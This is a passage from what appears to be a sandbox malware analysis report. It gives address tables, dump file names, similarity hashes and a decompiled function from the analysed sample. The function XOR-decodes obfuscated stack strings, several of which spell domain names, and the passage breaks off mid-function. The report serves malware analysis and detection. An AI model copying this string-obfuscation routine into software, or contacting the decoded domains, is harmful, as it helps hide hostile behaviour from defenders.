                                                                    0x00408b1e
                                                                    0x00408b20
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408b22
                                                                    0x00408b24
                                                                    0x00408b26
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408b28
                                                                    0x00408b2a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408b2c
                                                                    0x00408b2e
                                                                    0x0040a5c4
                                                                    0x0040a5c6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040a5cc
                                                                    0x0040a5d4
                                                                    0x0040a5d4
                                                                    0x0040a5dd
                                                                    0x0040a5de
                                                                    0x0040a5e3
                                                                    0x0040a5e3
                                                                    0x0040a5e6
                                                                    0x0040a5a9
                                                                    0x0040a5ab
                                                                    0x0040a5b4
                                                                    0x0040a5c1
                                                                    0x0040a5c1
                                                                    0x00408b34
                                                                    0x00408b34
                                                                    0x00408b38
                                                                    0x00408b42
                                                                    0x00408b42
                                                                    0x00408b3a
                                                                    0x00408b3a
                                                                    0x00408b3a
                                                                    0x00408b45
                                                                    0x00408b46
                                                                    0x00408b46
                                                                    0x00000000
                                                                    0x00408b00
                                                                    0x00408af5
                                                                    0x00408aa0
                                                                    0x00408aa0
                                                                    0x00408aa2
                                                                    0x00408aa4
                                                                    0x00408aaa
                                                                    0x00408aab
                                                                    0x00408ab6
                                                                    0x00408aca
                                                                    0x00408acc
                                                                    0x00408ad1
                                                                    0x00408ad3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408ad3
                                                                    0x00408aa6
                                                                    0x00408aa8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408ad5
                                                                    0x00408ad5
                                                                    0x00408ad6
                                                                    0x00408ad6
                                                                    0x00000000
                                                                    0x00408aa0
                                                                    0x00408a7c
                                                                    0x00408a83
                                                                    0x00000000
                                                                    0x00408a83
                                                                    0x004089e2
                                                                    0x004089b1
                                                                    0x00000000

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: _strrchr
                                                                    • String ID: $!$!$!$"$"$$$$$%$&$($)$)$)$*$*$*$+$+$+$+$,$,$,$,$-$-$/$/$/$4$4$4$6$8$;$;$<$<$=$=$>$>$?$@$@$A$A$B$C$C$C$D$D$D$D$D$E$E$E$F$F$G$H$H$I$I$I$I$J$J$K$K$K$K$L$L$M$N$P$P$R$R$S$[$[$]$]$]$_$_$_$`$`$e$e$f$g$h$h$h$i$k$m$m$m$m$n$o$o$o$p$q$r$t$u$u$u$v$v$v$x$x$y$y$y$y$z$z$|$}$}$}
                                                                    • API String ID: 3213747228-1042286297
                                                                    • Opcode ID: 3e39964cd65619847499687f1417586f80c792e08e73c2a4470ecf6dbee06fd4
                                                                    • Instruction ID: 647ce97b849d0b2f3efdee884134419833c0d52d5b1e35c0465f7469ea6cc106
                                                                    • Opcode Fuzzy Hash: 3e39964cd65619847499687f1417586f80c792e08e73c2a4470ecf6dbee06fd4
                                                                    • Instruction Fuzzy Hash: EB03783150C7D18AD33AC62884583DFBBC22BD6324F588BAEC5EA5B2E2D7744506C797
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 99%
                                                                    			E0040F990(void* __edi) {
                                                                    				intOrPtr _t418;
                                                                    				void* _t422;
                                                                    				intOrPtr* _t430;
                                                                    				void* _t431;
                                                                    				signed int _t432;
                                                                    				intOrPtr* _t434;
                                                                    				intOrPtr* _t437;
                                                                    				signed int _t442;
                                                                    				signed int _t445;
                                                                    				void* _t451;
                                                                    				signed int _t453;
                                                                    				signed int _t456;
                                                                    				void* _t462;
                                                                    				signed int _t465;
                                                                    				signed int _t467;
                                                                    				signed int _t468;
                                                                    				signed int _t469;
                                                                    				signed int _t470;
                                                                    				signed int _t471;
                                                                    				signed int _t475;
                                                                    				signed int _t477;
                                                                    				signed int _t479;
                                                                    				signed int _t480;
                                                                    				signed int _t481;
                                                                    				signed int _t482;
                                                                    				signed int _t483;
                                                                    				signed int _t484;
                                                                    				signed int _t488;
                                                                    				signed int _t491;
                                                                    				signed int _t493;
                                                                    				signed int _t494;
                                                                    				signed int _t495;
                                                                    				signed int _t496;
                                                                    				signed int _t497;
                                                                    				signed int _t498;
                                                                    				signed int _t499;
                                                                    				signed int _t503;
                                                                    				signed int _t506;
                                                                    				signed int _t510;
                                                                    				signed int _t513;
                                                                    				signed int _t515;
                                                                    				signed int _t518;
                                                                    				signed int _t521;
                                                                    				intOrPtr _t529;
                                                                    				intOrPtr _t531;
                                                                    				signed int _t539;
                                                                    				signed int _t541;
                                                                    				void* _t546;
                                                                    				void* _t552;
                                                                    				signed int _t555;
                                                                    				void* _t561;
                                                                    				void* _t570;
                                                                    				void* _t575;
                                                                    				void* _t584;
                                                                    				void* _t589;
                                                                    				void* _t598;
                                                                    				void* _t604;
                                                                    				void* _t609;
                                                                    				void* _t616;
                                                                    				void* _t621;
                                                                    				void* _t627;
                                                                    				void* _t638;
                                                                    				signed int _t639;
                                                                    				intOrPtr _t642;
                                                                    				void* _t643;
                                                                    				intOrPtr* _t647;
                                                                    				intOrPtr* _t649;
                                                                    
                                                                    				_t638 = __edi;
                                                                    				 *((char*)(_t649 + 0x2e)) = 0xf6;
                                                                    				 *((char*)(_t649 + 0x30)) = 0xf6;
                                                                    				_t418 =  *0x447b58; // 0x0
                                                                    				_t445 =  *_t649 + (_t418 -  *_t649 | 0x00000013) * 0x58;
                                                                    				 *((char*)(_t649 + 0x2c)) = 0xf4;
                                                                    				 *((char*)(_t649 + 0x2d)) = 0xe7;
                                                                    				 *((char*)(_t649 + 0x2e)) = 0xf0;
                                                                    				 *((char*)(_t649 + 0x2f)) = 0xf4;
                                                                    				 *((char*)(_t649 + 0x30)) = 0xfc;
                                                                    				 *((char*)(_t649 + 0x31)) = 0xfb;
                                                                    				 *((char*)(_t649 + 0x33)) = 0xbb;
                                                                    				 *((char*)(_t649 + 0x35)) = 0xfa;
                                                                    				 *((char*)(_t649 + 0x36)) = 0xf8;
                                                                    				 *((char*)(_t649 + 0x37)) = 0x95;
                                                                    				_t539 = 0;
                                                                    				do {
                                                                    					if(_t445 >= 0x6f) {
                                                                    						_t445 = _t445 + 0x15;
                                                                    					} else {
                                                                    						_t445 = _t445 * 0x25;
                                                                    					}
                                                                    					 *(_t649 + _t539 + 0x30) =  *(_t649 + _t539 + 0x30) ^ 0x00000095;
                                                                    					_t539 = _t539 + 1;
                                                                    				} while (_t539 < 0xc);
                                                                    				 *((char*)(_t649 + 0x60)) = 0xd3;
                                                                    				 *((char*)(_t649 + 0x64)) = 0xd3;
                                                                    				_t541 =  *(_t649 + 8) + (_t418 -  *(_t649 + 8) | 0x00000013) * 0x58;
                                                                    				 *((char*)(_t649 + 0x61)) = 0xd0;
                                                                    				 *((char*)(_t649 + 0x62)) = 0xd8;
                                                                    				 *((char*)(_t649 + 0x63)) = 0xd0;
                                                                    				 *((char*)(_t649 + 0x65)) = 0xca;
                                                                    				 *((char*)(_t649 + 0x66)) = 0xcc;
                                                                    				 *((char*)(_t649 + 0x67)) = 0xd0;
                                                                    				 *((char*)(_t649 + 0x68)) = 0x91;
                                                                    				 *((char*)(_t649 + 0x69)) = 0xdc;
                                                                    				 *((char*)(_t649 + 0x6a)) = 0xd0;
                                                                    				 *((char*)(_t649 + 0x6b)) = 0xd2;
                                                                    				 *((char*)(_t649 + 0x6c)) = 0xbf;
                                                                    				_t451 = 0;
                                                                    				do {
                                                                    					if(_t541 >= 0x6f) {
                                                                    						_t541 = _t541 + 0x15;
                                                                    					} else {
                                                                    						_t541 = _t541 * 0x25;
                                                                    					}
                                                                    					 *(_t649 + _t451 + 0x60) =  *(_t649 + _t451 + 0x60) ^ 0x000000bf;
                                                                    					_t451 = _t451 + 1;
                                                                    				} while (_t451 < 0xd);
                                                                    				_t453 =  *(_t649 + 8) + (_t418 -  *(_t649 + 8) | 0x00000013) * 0x58;
                                                                    				 *((char*)(_t649 + 0x70)) = 0x79;
                                                                    				 *((char*)(_t649 + 0x71)) = 0x74;
                                                                    				 *((char*)(_t649 + 0x72)) = 0x70;
                                                                    				 *((char*)(_t649 + 0x73)) = 0x65;
                                                                    				 *((char*)(_t649 + 0x74)) = 0x66;
                                                                    				 *((char*)(_t649 + 0x75)) = 0x70;
                                                                    				 *((char*)(_t649 + 0x76)) = 0x67;
                                                                    				 *((char*)(_t649 + 0x77)) = 0x74;
                                                                    				 *((char*)(_t649 + 0x78)) = 0x3f;
                                                                    				 *((char*)(_t649 + 0x79)) = 0x72;
                                                                    				 *((char*)(_t649 + 0x7a)) = 0x7e;
                                                                    				 *((char*)(_t649 + 0x7b)) = 0x7c;
                                                                    				 *((char*)(_t649 + 0x7c)) = 0x11;
                                                                    				_t546 = 0;
                                                                    				do {
                                                                    					if(_t453 >= 0x6f) {
                                                                    						_t453 = _t453 + 0x15;
                                                                    					} else {
                                                                    						_t453 = _t453 * 0x25;
                                                                    					}
                                                                    					 *(_t649 + _t546 + 0x70) =  *(_t649 + _t546 + 0x70) ^ 0x00000011;
                                                                    					_t546 = _t546 + 1;
                                                                    				} while (_t546 < 0xd);
                                                                    				 *((char*)(_t649 + 0x4b)) = 0xb4;
                                                                    				 *((char*)(_t649 + 0x4d)) = 0xb4;
                                                                    				 *((char*)(_t649 + 0x48)) = 0xb8;
                                                                    				 *((char*)(_t649 + 0x4c)) = 0xb8;
                                                                    				 *((char*)(_t649 + 0x52)) = 0xb8;
                                                                    				_t456 =  *(_t649 + 8) + (_t418 -  *(_t649 + 8) | 0x00000013) * 0x58;
                                                                    				 *((char*)(_t649 + 0x49)) = 0xb0;
                                                                    				 *((char*)(_t649 + 0x4a)) = 0xb2;
                                                                    				 *((char*)(_t649 + 0x4e)) = 0xbb;
                                                                    				 *((char*)(_t649 + 0x4f)) = 0xfb;
                                                                    				 *((char*)(_t649 + 0x50)) = 0xb6;
                                                                    				 *((char*)(_t649 + 0x51)) = 0xba;
                                                                    				 *((char*)(_t649 + 0x53)) = 0xd5;
                                                                    				_t552 = 0;
                                                                    				do {
                                                                    					if(_t456 >= 0x6f) {
                                                                    						_t456 = _t456 + 0x15;
                                                                    					} else {
                                                                    						_t456 = _t456 * 0x25;
                                                                    					}
                                                                    					 *(_t649 + _t552 + 0x48) =  *(_t649 + _t552 + 0x48) ^ 0x000000d5;
                                                                    					_t552 = _t552 + 1;
                                                                    				} while (_t552 < 0xc);
                                                                    				 *((char*)(_t649 + 0x93)) = 0x38;
                                                                    				 *((char*)(_t649 + 0x9a)) = 0x38;
                                                                    				 *((char*)(_t649 + 0x91)) = 0x34;
                                                                    				 *((char*)(_t649 + 0x99)) = 0x34;
                                                                    				_t555 =  *(_t649 + 8) + (_t418 -  *(_t649 + 8) | 0x00000013) * 0x58;
                                                                    				 *((char*)(_t649 + 0x90)) = 0x24;
                                                                    				 *((char*)(_t649 + 0x92)) = 0x3f;
                                                                    				 *((char*)(_t649 + 0x94)) = 0x3b;
                                                                    				 *((char*)(_t649 + 0x95)) = 0x2d;
                                                                    				 *((char*)(_t649 + 0x96)) = 0x32;
                                                                    				 *((char*)(_t649 + 0x97)) = 0x24;
                                                                    				 *((char*)(_t649 + 0x98)) = 0x79;
                                                                    				 *((char*)(_t649 + 0x9b)) = 0x3a;
                                                                    				 *((char*)(_t649 + 0x9c)) = 0x57;
                                                                    				_t462 = 0;
                                                                    				do {
                                                                    					if(_t555 >= 0x6f) {
                                                                    						_t555 = _t555 + 0x15;
                                                                    					} else {
                                                                    						_t555 = _t555 * 0x25;
                                                                    					}
                                                                    					 *(_t649 + _t462 + 0x90) =  *(_t649 + _t462 + 0x90) ^ 0x00000057;
                                                                    					_t462 = _t462 + 1;
                                                                    				} while (_t462 < 0xd);
                                                                    				 *((char*)(_t649 + 0xa8)) = 0x80;
                                                                    				 *((char*)(_t649 + 0xab)) = 0x80;
                                                                    				 *((char*)(_t649 + 0xa3)) = 0x86;
                                                                    				 *((char*)(_t649 + 0xa6)) = 0x86;
                                                                    				 *((char*)(_t649 + 0xa9)) = 0x86;
                                                                    				_t465 =  *(_t649 + 8) + (_t418 -  *(_t649 + 8) | 0x00000013) * 0x58;
                                                                    				 *((char*)(_t649 + 0xa0)) = 0x84;
                                                                    				 *((char*)(_t649 + 0xa1)) = 0x96;
                                                                    				 *((char*)(_t649 + 0xa2)) = 0x8a;
                                                                    				 *((char*)(_t649 + 0xa4)) = 0x91;
                                                                    				 *((char*)(_t649 + 0xa5)) = 0x85;
                                                                    				 *((char*)(_t649 + 0xa7)) = 0x8d;
                                                                    				 *((char*)(_t649 + 0xaa)) = 0xcd;
                                                                    				 *((char*)(_t649 + 0xac)) = 0x8c;
                                                                    				 *((char*)(_t649 + 0xad)) = 0x8e;
                                                                    				 *((char*)(_t649 + 0xae)) = 0xe3;
                                                                    				_t561 = 0;
                                                                    				do {
                                                                    					if(_t465 >= 0x6f) {
                                                                    						_t465 = _t465 + 0x15;
                                                                    					} else {
                                                                    						_t465 = _t465 * 0x25;
                                                                    					}
                                                                    					 *(_t649 + _t561 + 0xa0) =  *(_t649 + _t561 + 0xa0) ^ 0x000000e3;
                                                                    					_t561 = _t561 + 1;
                                                                    				} while (_t561 < 0xf);
                                                                    				_t467 =  *(_t649 + 8) + (_t418 -  *(_t649 + 8) | 0x00000013) * 0x58;
                                                                    				if(_t467 >= 0x6f) {
                                                                    					_t468 = _t467 + 0x15;
                                                                    				} else {
                                                                    					_t468 = _t467 * 0x25;
                                                                    				}
                                                                    				 *((char*)(_t649 + 0xf8)) = 0x74;
                                                                    				if(_t468 >= 0x6f) {
                                                                    					_t469 = _t468 + 0x15;
                                                                    				} else {
                                                                    					_t469 = _t468 * 0x25;
                                                                    				}
                                                                    				 *((char*)(_t649 + 0xf9)) = 0x6a;
                                                                    				if(_t469 >= 0x6f) {
                                                                    					_t470 = _t469 + 0x15;
                                                                    				} else {
                                                                    					_t470 = _t469 * 0x25;
                                                                    				}
                                                                    				 *((char*)(_t649 + 0xfa)) = 0x68;
                                                                    				if(_t470 >= 0x6f) {
                                                                    					_t471 = _t470 + 0x15;
                                                                    				} else {
                                                                    					_t471 = _t470 * 0x25;
                                                                    				}
                                                                    				 *((char*)(_t649 + 0xfb)) = 0x2e;
                                                                    				if(_t471 < 0x6f) {
                                                                    					 *(_t649 + 8) = _t471 * 0x25;
                                                                    				}
                                                                    				 *((char*)(_t649 + 0x29)) = 0x7f;
                                                                    				 *((char*)(_t649 + 0x2b)) = 0x7f;
                                                                    				_t475 =  *(_t649 + 8) + (_t418 -  *(_t649 + 8) | 0x00000013) * 0x58;
                                                                    				 *((char*)(_t649 + 0xfc)) = 0x63;
                                                                    				 *((char*)(_t649 + 0xfd)) = 0x6f;
                                                                    				 *((char*)(_t649 + 0xfe)) = 0x6d;
                                                                    				 *((char*)(_t649 + 0xff)) = 0;
                                                                    				 *((char*)(_t649 + 0x24)) = 0x61;
                                                                    				 *((char*)(_t649 + 0x25)) = 0x79;
                                                                    				 *((char*)(_t649 + 0x26)) = 0x70;
                                                                    				 *((char*)(_t649 + 0x27)) = 0x6b;
                                                                    				 *((char*)(_t649 + 0x28)) = 0x74;
                                                                    				 *((char*)(_t649 + 0x2a)) = 0x3f;
                                                                    				 *((char*)(_t649 + 0x2c)) = 0x74;
                                                                    				 *((char*)(_t649 + 0x2d)) = 0x65;
                                                                    				 *((char*)(_t649 + 0x2e)) = 0x11;
                                                                    				_t570 = 0;
                                                                    				do {
                                                                    					if(_t475 >= 0x6f) {
                                                                    						_t475 = _t475 + 0x15;
                                                                    					} else {
                                                                    						_t475 = _t475 * 0x25;
                                                                    					}
                                                                    					 *(_t649 + _t570 + 0x24) =  *(_t649 + _t570 + 0x24) ^ 0x00000011;
                                                                    					_t570 = _t570 + 1;
                                                                    				} while (_t570 < 0xb);
                                                                    				_t477 =  *(_t649 + 8) + (_t418 -  *(_t649 + 8) | 0x00000013) * 0x58;
                                                                    				 *((char*)(_t649 + 0x3c)) = 0xa5;
                                                                    				 *((char*)(_t649 + 0x3d)) = 0xa0;
                                                                    				 *((char*)(_t649 + 0x3e)) = 0xb1;
                                                                    				 *((char*)(_t649 + 0x3f)) = 0xa2;
                                                                    				 *((char*)(_t649 + 0x40)) = 0xa7;
                                                                    				 *((char*)(_t649 + 0x41)) = 0xaa;
                                                                    				 *((char*)(_t649 + 0x42)) = 0xac;
                                                                    				 *((char*)(_t649 + 0x43)) = 0xed;
                                                                    				 *((char*)(_t649 + 0x44)) = 0xad;
                                                                    				 *((char*)(_t649 + 0x45)) = 0xa6;
                                                                    				 *((char*)(_t649 + 0x46)) = 0xb7;
                                                                    				 *((char*)(_t649 + 0x47)) = 0xc3;
                                                                    				_t575 = 0;
                                                                    				do {
                                                                    					if(_t477 >= 0x6f) {
                                                                    						_t477 = _t477 + 0x15;
                                                                    					} else {
                                                                    						_t477 = _t477 * 0x25;
                                                                    					}
                                                                    					 *(_t649 + _t575 + 0x3c) =  *(_t649 + _t575 + 0x3c) ^ 0x000000c3;
                                                                    					_t575 = _t575 + 1;
                                                                    				} while (_t575 < 0xc);
                                                                    				_t479 =  *(_t649 + 8) + (_t418 -  *(_t649 + 8) | 0x00000013) * 0x58;
                                                                    				if(_t479 >= 0x6f) {
                                                                    					_t480 = _t479 + 0x15;
                                                                    				} else {
                                                                    					_t480 = _t479 * 0x25;
                                                                    				}
                                                                    				 *((char*)(_t649 + 0x118)) = 0x6e;
                                                                    				if(_t480 >= 0x6f) {
                                                                    					_t481 = _t480 + 0x15;
                                                                    				} else {
                                                                    					_t481 = _t480 * 0x25;
                                                                    				}
                                                                    				 *((char*)(_t649 + 0x119)) = 0x69;
                                                                    				if(_t481 >= 0x6f) {
                                                                    					_t482 = _t481 + 0x15;
                                                                    				} else {
                                                                    					_t482 = _t481 * 0x25;
                                                                    				}
                                                                    				 *((char*)(_t649 + 0x11a)) = 0x65;
                                                                    				if(_t482 >= 0x6f) {
                                                                    					_t483 = _t482 + 0x15;
                                                                    				} else {
                                                                    					_t483 = _t482 * 0x25;
                                                                    				}
                                                                    				 *((char*)(_t649 + 0x11b)) = 0x74;
                                                                    				if(_t483 >= 0x6f) {
                                                                    					_t484 = _t483 + 0x15;
                                                                    				} else {
                                                                    					_t484 = _t483 * 0x25;
                                                                    				}
                                                                    				 *((char*)(_t649 + 0x11c)) = 0x2e;
                                                                    				if(_t484 < 0x6f) {
                                                                    					 *(_t649 + 8) = _t484 * 0x25;
                                                                    				}
                                                                    				 *((char*)(_t649 + 0xc3)) = 0xb5;
                                                                    				 *((char*)(_t649 + 0xc5)) = 0xb5;
                                                                    				 *((char*)(_t649 + 0xc9)) = 0xb5;
                                                                    				_t488 =  *(_t649 + 8) + (_t418 -  *(_t649 + 8) | 0x00000013) * 0x58;
                                                                    				 *((char*)(_t649 + 0x11d)) = 0x63;
                                                                    				 *((char*)(_t649 + 0x11e)) = 0x6f;
                                                                    				 *((char*)(_t649 + 0x11f)) = 0x6d;
                                                                    				 *((char*)(_t649 + 0x120)) = 0;
                                                                    				 *((char*)(_t649 + 0xc0)) = 0xb7;
                                                                    				 *((char*)(_t649 + 0xc1)) = 0xb1;
                                                                    				 *((char*)(_t649 + 0xc2)) = 0xbd;
                                                                    				 *((char*)(_t649 + 0xc4)) = 0xa4;
                                                                    				 *((char*)(_t649 + 0xc6)) = 0xbd;
                                                                    				 *((char*)(_t649 + 0xc7)) = 0xa0;
                                                                    				 *((char*)(_t649 + 0xc8)) = 0xbc;
                                                                    				 *((char*)(_t649 + 0xca)) = 0xfe;
                                                                    				 *((char*)(_t649 + 0xcb)) = 0xb3;
                                                                    				 *((char*)(_t649 + 0xcc)) = 0xbf;
                                                                    				 *((char*)(_t649 + 0xcd)) = 0xbd;
                                                                    				 *((char*)(_t649 + 0xce)) = 0xd0;
                                                                    				_t584 = 0;
                                                                    				do {
                                                                    					if(_t488 >= 0x6f) {
                                                                    						_t488 = _t488 + 0x15;
                                                                    					} else {
                                                                    						_t488 = _t488 * 0x25;
                                                                    					}
                                                                    					 *(_t649 + _t584 + 0xc0) =  *(_t649 + _t584 + 0xc0) ^ 0x000000d0;
                                                                    					_t584 = _t584 + 1;
                                                                    				} while (_t584 < 0xf);
                                                                    				 *((char*)(_t649 + 0x55)) = 0x88;
                                                                    				 *((char*)(_t649 + 0x58)) = 0x88;
                                                                    				_t491 =  *(_t649 + 8) + (_t418 -  *(_t649 + 8) | 0x00000013) * 0x58;
                                                                    				 *((char*)(_t649 + 0x54)) = 0x8c;
                                                                    				 *((char*)(_t649 + 0x56)) = 0x85;
                                                                    				 *((char*)(_t649 + 0x57)) = 0x8c;
                                                                    				 *((char*)(_t649 + 0x59)) = 0x82;
                                                                    				 *((char*)(_t649 + 0x5a)) = 0x89;
                                                                    				 *((char*)(_t649 + 0x5b)) = 0xcf;
                                                                    				 *((char*)(_t649 + 0x5c)) = 0x8f;
                                                                    				 *((char*)(_t649 + 0x5d)) = 0x84;
                                                                    				 *((char*)(_t649 + 0x5e)) = 0x95;
                                                                    				 *((char*)(_t649 + 0x5f)) = 0xe1;
                                                                    				_t589 = 0;
                                                                    				do {
                                                                    					if(_t491 >= 0x6f) {
                                                                    						_t491 = _t491 + 0x15;
                                                                    					} else {
                                                                    						_t491 = _t491 * 0x25;
                                                                    					}
                                                                    					 *(_t649 + _t589 + 0x54) =  *(_t649 + _t589 + 0x54) ^ 0x000000e1;
                                                                    					_t589 = _t589 + 1;
                                                                    				} while (_t589 < 0xc);
                                                                    				_t493 =  *(_t649 + 8) + (_t418 -  *(_t649 + 8) | 0x00000013) * 0x58;
                                                                    				if(_t493 >= 0x6f) {
                                                                    					_t494 = _t493 + 0x15;
                                                                    				} else {
                                                                    					_t494 = _t493 * 0x25;
                                                                    				}
                                                                    				 *((char*)(_t649 + 0x124)) = 0x76;
                                                                    				if(_t494 >= 0x6f) {
                                                                    					_t495 = _t494 + 0x15;
                                                                    				} else {
                                                                    					_t495 = _t494 * 0x25;
                                                                    				}
                                                                    				 *((char*)(_t649 + 0x125)) = 0x69;
                                                                    				if(_t495 >= 0x6f) {
                                                                    					_t496 = _t495 + 0x15;
                                                                    				} else {
                                                                    					_t496 = _t495 * 0x25;
                                                                    				}
                                                                    				 *((char*)(_t649 + 0x126)) = 0x65;
                                                                    				if(_t496 >= 0x6f) {
                                                                    					_t497 = _t496 + 0x15;
                                                                    				} else {
                                                                    					_t497 = _t496 * 0x25;
                                                                    				}
                                                                    				 *((char*)(_t649 + 0x127)) = 0x6e;
                                                                    				if(_t497 >= 0x6f) {
                                                                    					_t498 = _t497 + 0x15;
                                                                    				} else {
                                                                    					_t498 = _t497 * 0x25;
                                                                    				}
                                                                    				 *((char*)(_t649 + 0x128)) = 0x67;
                                                                    				if(_t498 >= 0x6f) {
                                                                    					_t499 = _t498 + 0x15;
                                                                    				} else {
                                                                    					_t499 = _t498 * 0x25;
                                                                    				}
                                                                    				 *((char*)(_t649 + 0x129)) = 0x2e;
                                                                    				if(_t499 < 0x6f) {
                                                                    					 *(_t649 + 8) = _t499 * 0x25;
                                                                    				}
                                                                    				 *((char*)(_t649 + 0x1b)) = 0x99;
                                                                    				 *((char*)(_t649 + 0x21)) = 0x99;
                                                                    				_t503 =  *(_t649 + 8) + (_t418 -  *(_t649 + 8) | 0x00000013) * 0x58;
                                                                    				 *((char*)(_t649 + 0x12a)) = 0x63;
                                                                    				 *((char*)(_t649 + 0x12b)) = 0x6f;
                                                                    				 *((char*)(_t649 + 0x12c)) = 0x6d;
                                                                    				 *((char*)(_t649 + 0x12d)) = 0;
                                                                    				 *((char*)(_t649 + 0x18)) = 0x91;
                                                                    				 *((char*)(_t649 + 0x19)) = 0x98;
                                                                    				 *((char*)(_t649 + 0x1a)) = 0x95;
                                                                    				 *((char*)(_t649 + 0x1c)) = 0x91;
                                                                    				 *((char*)(_t649 + 0x1d)) = 0x8c;
                                                                    				 *((char*)(_t649 + 0x1e)) = 0xda;
                                                                    				 *((char*)(_t649 + 0x1f)) = 0x97;
                                                                    				 *((char*)(_t649 + 0x20)) = 0x9b;
                                                                    				 *((char*)(_t649 + 0x22)) = 0xf4;
                                                                    				_t598 = 0;
                                                                    				do {
                                                                    					if(_t503 >= 0x6f) {
                                                                    						_t503 = _t503 + 0x15;
                                                                    					} else {
                                                                    						_t503 = _t503 * 0x25;
                                                                    					}
                                                                    					 *(_t649 + _t598 + 0x18) =  *(_t649 + _t598 + 0x18) ^ 0x000000f4;
                                                                    					_t598 = _t598 + 1;
                                                                    				} while (_t598 < 0xb);
                                                                    				 *((char*)(_t649 + 0xb4)) = 3;
                                                                    				 *((char*)(_t649 + 0xbd)) = 3;
                                                                    				 *((char*)(_t649 + 0xb5)) = 1;
                                                                    				 *((char*)(_t649 + 0xbc)) = 1;
                                                                    				_t506 =  *(_t649 + 8) + (_t418 -  *(_t649 + 8) | 0x00000013) * 0x58;
                                                                    				 *((char*)(_t649 + 0xb0)) = 0x1d;
                                                                    				 *((char*)(_t649 + 0xb1)) = 0x17;
                                                                    				 *((char*)(_t649 + 0xb2)) = 0xd;
                                                                    				 *((char*)(_t649 + 0xb3)) = 0xf;
                                                                    				 *((char*)(_t649 + 0xb6)) = 0x1c;
                                                                    				 *((char*)(_t649 + 0xb7)) = 0xb;
                                                                    				 *((char*)(_t649 + 0xb8)) = 0x1e;
                                                                    				 *((char*)(_t649 + 0xb9)) = 0xa;
                                                                    				 *((char*)(_t649 + 0xba)) = 0x40;
                                                                    				 *((char*)(_t649 + 0xbb)) = 0xd;
                                                                    				 *((char*)(_t649 + 0xbe)) = 0x6e;
                                                                    				_t604 = 0;
                                                                    				do {
                                                                    					if(_t506 >= 0x6f) {
                                                                    						_t506 = _t506 + 0x15;
                                                                    					} else {
                                                                    						_t506 = _t506 * 0x25;
                                                                    					}
                                                                    					 *(_t649 + _t604 + 0xb0) =  *(_t649 + _t604 + 0xb0) ^ 0x0000006e;
                                                                    					_t604 = _t604 + 1;
                                                                    				} while (_t604 < 0xf);
                                                                    				 *((char*)(_t649 + 0xd1)) = 0xf1;
                                                                    				 *((char*)(_t649 + 0xd3)) = 0xf1;
                                                                    				 *((char*)(_t649 + 0xd4)) = 0xf7;
                                                                    				 *((char*)(_t649 + 0xdc)) = 0xf7;
                                                                    				_t510 =  *(_t649 + 8) + (_t418 -  *(_t649 + 8) | 0x00000013) * 0x58;
                                                                    				 *((char*)(_t649 + 0xd0)) = 0xe7;
                                                                    				 *((char*)(_t649 + 0xd2)) = 0xf8;
                                                                    				 *((char*)(_t649 + 0xd5)) = 0xe0;
                                                                    				 *((char*)(_t649 + 0xd6)) = 0xe4;
                                                                    				 *((char*)(_t649 + 0xd7)) = 0xf8;
                                                                    				 *((char*)(_t649 + 0xd8)) = 0xf5;
                                                                    				 *((char*)(_t649 + 0xd9)) = 0xfa;
                                                                    				 *((char*)(_t649 + 0xda)) = 0xe7;
                                                                    				 *((char*)(_t649 + 0xdb)) = 0xba;
                                                                    				 *((char*)(_t649 + 0xdd)) = 0xfb;
                                                                    				 *((char*)(_t649 + 0xde)) = 0xf9;
                                                                    				 *((char*)(_t649 + 0xdf)) = 0x94;
                                                                    				_t609 = 0;
                                                                    				do {
                                                                    					if(_t510 >= 0x6f) {
                                                                    						_t510 = _t510 + 0x15;
                                                                    					} else {
                                                                    						_t510 = _t510 * 0x25;
                                                                    					}
                                                                    					 *(_t649 + _t609 + 0xd0) =  *(_t649 + _t609 + 0xd0) ^ 0x00000094;
                                                                    					_t609 = _t609 + 1;
                                                                    				} while (_t609 < 0x10);
                                                                    				 *((char*)(_t649 + 0x104)) = 0x51;
                                                                    				 *((char*)(_t649 + 0x108)) = 0x51;
                                                                    				 *((char*)(_t649 + 0x10c)) = 0x51;
                                                                    				 *((char*)(_t649 + 0x10d)) = 0x46;
                                                                    				 *((char*)(_t649 + 0x112)) = 0x46;
                                                                    				 *((char*)(_t649 + 0x101)) = 0x4c;
                                                                    				 *((char*)(_t649 + 0x103)) = 0x4c;
                                                                    				 *((char*)(_t649 + 0x107)) = 0x4c;
                                                                    				 *((char*)(_t649 + 0x10f)) = 0x4c;
                                                                    				 *((char*)(_t649 + 0x115)) = 0x4c;
                                                                    				_t513 =  *(_t649 + 8) + (_t418 -  *(_t649 + 8) | 0x00000013) * 0x58;
                                                                    				 *((char*)(_t649 + 0x100)) = 0x4e;
                                                                    				 *((char*)(_t649 + 0x102)) = 0x57;
                                                                    				 *((char*)(_t649 + 0x105)) = 0x50;
                                                                    				 *((char*)(_t649 + 0x106)) = 0x53;
                                                                    				 *((char*)(_t649 + 0x109)) = 0x57;
